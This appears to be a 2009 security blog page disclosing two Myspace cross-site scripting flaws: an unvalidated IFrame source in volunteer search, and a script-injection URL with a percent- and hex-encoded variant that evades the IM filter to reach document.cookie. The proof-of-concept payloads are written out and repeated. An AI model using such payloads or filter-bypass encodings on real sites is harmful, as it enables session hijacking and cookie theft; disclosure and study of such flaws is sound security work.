http://www.myspace.com/volunteerspace?searchresults=http://cross-site-scripting.blogspot.com/
Sunday, August 30, 2009
Insecure IFrame - Myspace.com
The Myspace volunteer search results are embedded in the page using an IFrame, its source set by the searchresults field of the query string. Because no checks are performed on the URL specified by the field, any can be used. The result is a hard to detect XSS vulnerability; it even works with Internet Explorer 8 despite the new anti-XSS measures.
http://www.myspace.com/volunteerspace?searchresults=http://cross-site-scripting.blogspot.com/
http://www.myspace.com/volunteerspace?searchresults=http://cross-site-scripting.blogspot.com/
Sunday, August 16, 2009
Bypassing Myspace IM XSS Filters - Myspace.com
The filtering Myspace IM uses is rather aggressive. Regardless of context, document. is changed to document· and eval() to ..). By using percent-encoding and JavaScript escaped hex sequences this can be circumvented.
The vulnerability (only works when logged in):
http://myspace.com/index.cfm?fuseaction="};alert(0);var x={"":"
The vulnerability re-encoded to bypass IM filters:
http://myspace.com/index.cfm?fuseaction=%22};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22
The vulnerability (only works when logged in):
http://myspace.com/index.cfm?fuseaction="};alert(0);var x={"":"
The vulnerability re-encoded to bypass IM filters:
http://myspace.com/index.cfm?fuseaction=%22};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22
Subscribe to:
Posts (Atom)
